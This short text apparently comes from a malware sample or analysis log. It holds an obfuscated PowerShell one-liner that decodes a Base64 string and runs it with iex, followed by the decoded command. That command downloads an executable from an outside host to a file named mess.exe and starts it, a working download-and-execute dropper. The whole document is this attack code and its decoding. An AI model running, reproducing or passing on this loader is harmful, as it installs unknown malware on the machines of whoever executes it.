iex([SySTeM.tEXT.ENcODiNg]::UTF8.GeTSTrinG([system.CoNVeRt]::frOmBaSE64strINg('CihOZXctT2JqZWN0IFNZc1RFTS5uZVQud0VCQ0xJZW50KS5Eb3duTG9BZEZpTEUoJ2h0dHA6Ly9jYWpvcy5pbi8weC8xLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object SYsTEM.neT.wEBCLIent).DownLoAdFiLE('http://cajos.in/0x/1.exe','mess.exe');Start-Process 'mess.exe'

